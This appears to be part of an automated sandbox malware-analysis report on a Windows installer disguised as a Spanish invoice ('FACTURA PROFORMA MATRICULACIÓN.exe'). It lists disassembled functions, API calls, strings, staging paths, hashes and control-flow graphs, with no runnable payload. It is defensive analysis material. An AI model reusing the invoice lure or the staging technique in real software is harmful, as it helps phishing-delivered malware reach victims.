                                                  • DeleteFileW.KERNELBASE(?,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405C76
                                                  • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405CBE
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405CE1
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405CE7
                                                  • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405CF7
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                  • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                  Strings
                                                  • "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe", xrefs: 00405C56
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5A
                                                  • \*.*, xrefs: 00405CB8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-1509977935
                                                  • Opcode ID: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
                                                  • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                                  • Opcode Fuzzy Hash: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
                                                  • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE
                                                  Function 0040689E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(77943420,00425F58,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00405F61,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                  • FindClose.KERNEL32(00000000), ref: 004068B5
                                                  Strings
                                                  • X_B, xrefs: 0040689F
                                                  • C:\Users\user\AppData\Local\Temp\nskBC9B.tmp, xrefs: 0040689E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp$X_B
                                                  • API String ID: 2295610775-4051690426
                                                  • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                  • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                                  • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                  • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C
                                                  Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                  • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                                  • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                  • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                  Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet, xrefs: 0040228E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet
                                                  • API String ID: 542301482-719092821
                                                  • Opcode ID: f85662b23458363dd6ab5ae1447e3296406ee4d16919afc4b05b52c53faf9e24
                                                  • Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
                                                  • Opcode Fuzzy Hash: f85662b23458363dd6ab5ae1447e3296406ee4d16919afc4b05b52c53faf9e24
                                                  • Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                  Function 00401F03 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 1c1008cabeb65706c4d80cd9f40d1efee8b09dc724503127a4cfafcc83429b1a
                                                  • Instruction ID: cc057469d20fee5af05168c8280afa7b014ceb16d0f4b1b408cb009327ac905f
                                                  • Opcode Fuzzy Hash: 1c1008cabeb65706c4d80cd9f40d1efee8b09dc724503127a4cfafcc83429b1a
                                                  • Instruction Fuzzy Hash: 7BE04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
                                                  Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 79cd65a6ba4c4f8614d2d44d2a0d076d8c5b6b6456474cad0f31bdfcd7c7fe30
                                                  • Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
                                                  • Opcode Fuzzy Hash: 79cd65a6ba4c4f8614d2d44d2a0d076d8c5b6b6456474cad0f31bdfcd7c7fe30
                                                  • Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29
                                                  Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 202 403fc1-403fd3 203 403fd9-403fdf 202->203 204 40413a-404149 202->204 203->204 205 403fe5-403fee 203->205 206 404198-4041ad 204->206 207 40414b-404193 GetDlgItem * 2 call 4044c0 SetClassLongW call 40140b 204->207 208 403ff0-403ffd SetWindowPos 205->208 209 404003-40400a 205->209 211 4041ed-4041f2 call 40450c 206->211 212 4041af-4041b2 206->212 207->206 208->209 214 40400c-404026 ShowWindow 209->214 215 40404e-404054 209->215 220 4041f7-404212 211->220 217 4041b4-4041bf call 401389 212->217 218 4041e5-4041e7 212->218 221 404127-404135 call 404527 214->221 222 40402c-40403f GetWindowLongW 214->222 223 404056-404068 DestroyWindow 215->223 224 40406d-404070 215->224 217->218 243 4041c1-4041e0 SendMessageW 217->243 218->211 219 40448d 218->219 231 40448f-404496 219->231 228 404214-404216 call 40140b 220->228 229 40421b-404221 220->229 221->231 222->221 230 404045-404048 ShowWindow 222->230 232 40446a-404470 223->232 234 404072-40407e SetWindowLongW 224->234 235 404083-404089 224->235 228->229 240 404227-404232 229->240 241 40444b-404464 DestroyWindow EndDialog 229->241 230->215 232->219 239 404472-404478 232->239 234->231 235->221 242 40408f-40409e GetDlgItem 235->242 239->219 244 40447a-404483 ShowWindow 239->244 240->241 245 404238-404285 call 40657e call 4044c0 * 3 GetDlgItem 240->245 241->232 246 4040a0-4040b7 SendMessageW IsWindowEnabled 242->246 247 4040bd-4040c0 242->247 243->231 244->219 274 404287-40428c 245->274 275 40428f-4042cb ShowWindow KiUserCallbackDispatcher call 4044e2 EnableWindow 245->275 246->219 246->247 249 4040c2-4040c3 247->249 250 4040c5-4040c8 247->250 251 4040f3-4040f8 call 404499 249->251 252 4040d6-4040db 250->252 253 4040ca-4040d0 250->253 251->221 255 404111-404121 SendMessageW 252->255 257 4040dd-4040e3 252->257 253->255 256 4040d2-4040d4 253->256 255->221 256->251 260 4040e5-4040eb call 40140b 257->260 261 4040fa-404103 call 40140b 257->261 270 4040f1 260->270 261->221 271 404105-40410f 261->271 270->251 271->270 274->275 278 4042d0 275->278 279 4042cd-4042ce 275->279 280 4042d2-404300 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404302-404313 SendMessageW 280->281 282 404315 280->282 283 40431b-40435a call 4044f5 call 403fa2 call 406541 lstrlenW call 40657e SetWindowTextW call 401389 281->283 282->283 283->220 294 404360-404362 283->294 294->220 295 404368-40436c 294->295 296 40438b-40439f DestroyWindow 295->296 297 40436e-404374 295->297 296->232 299 4043a5-4043d2 CreateDialogParamW 296->299 297->219 298 40437a-404380 297->298 298->220 300 404386 298->300 299->232 301 4043d8-40442f call 4044c0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->219 301->219 306 404431-404444 ShowWindow call 40450c 301->306 308 404449 306->308 308->232
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                  • ShowWindow.USER32(?), ref: 0040401D
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                  • ShowWindow.USER32(?,?), ref: 00404048
                                                  • DestroyWindow.USER32 ref: 0040405C
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                  • GetDlgItem.USER32(?,?), ref: 00404094
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                  • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                  • GetDlgItem.USER32(?,?), ref: 0040415A
                                                  • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041CF
                                                  • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                  • ShowWindow.USER32(00000000,?), ref: 00404296
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                                  • EnableWindow.USER32(?,?), ref: 004042C3
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042D9
                                                  • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 004042F8
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                  • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                  • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                  • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID:
                                                  • API String ID: 121052019-0
                                                  • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                  • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                  • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                  • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E
                                                  Function 00403C13 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 309 403c13-403c2b call 406935 312 403c2d-403c3d call 406488 309->312 313 403c3f-403c76 call 40640f 309->313 322 403c99-403cc2 call 403ee9 call 405f18 312->322 318 403c78-403c89 call 40640f 313->318 319 403c8e-403c94 lstrcatW 313->319 318->319 319->322 327 403d54-403d5c call 405f18 322->327 328 403cc8-403ccd 322->328 334 403d6a-403d8f LoadImageW 327->334 335 403d5e-403d65 call 40657e 327->335 328->327 329 403cd3-403ced call 40640f 328->329 333 403cf2-403cfb 329->333 333->327 336 403cfd-403d01 333->336 338 403e10-403e18 call 40140b 334->338 339 403d91-403dc1 RegisterClassW 334->339 335->334 340 403d13-403d1f lstrlenW 336->340 341 403d03-403d10 call 405e3d 336->341 350 403e22-403e2d call 403ee9 338->350 351 403e1a-403e1d 338->351 342 403dc7-403e0b SystemParametersInfoW CreateWindowExW 339->342 343 403edf 339->343 348 403d21-403d2f lstrcmpiW 340->348 349 403d47-403d4f call 405e10 call 406541 340->349 341->340 342->338 347 403ee1-403ee8 343->347 348->349 354 403d31-403d3b GetFileAttributesW 348->354 349->327 362 403e33-403e4d ShowWindow call 4068c5 350->362 363 403eb6-403eb7 call 405699 350->363 351->347 357 403d41-403d42 call 405e5c 354->357 358 403d3d-403d3f 354->358 357->349 358->349 358->357 370 403e59-403e6b GetClassInfoW 362->370 371 403e4f-403e54 call 4068c5 362->371 366 403ebc-403ebe 363->366 368 403ec0-403ec6 366->368 369 403ed8-403eda call 40140b 366->369 368->351 372 403ecc-403ed3 call 40140b 368->372 369->343 375 403e83-403ea6 DialogBoxParamW call 40140b 370->375 376 403e6d-403e7d GetClassInfoW RegisterClassW 370->376 371->370 372->351 380 403eab-403eb4 call 403b63 375->380 376->375 380->347
                                                  APIs
                                                    • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                    • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                  • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,77943420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",00008001), ref: 00403C94
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,77943420), ref: 00403D14
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403D32
                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet), ref: 00403D7B
                                                    • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                  • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                  • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                  • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                  • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-2772958463
                                                  • Opcode ID: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
                                                  • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                  • Opcode Fuzzy Hash: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
                                                  • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D
                                                  Function 004030A2 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
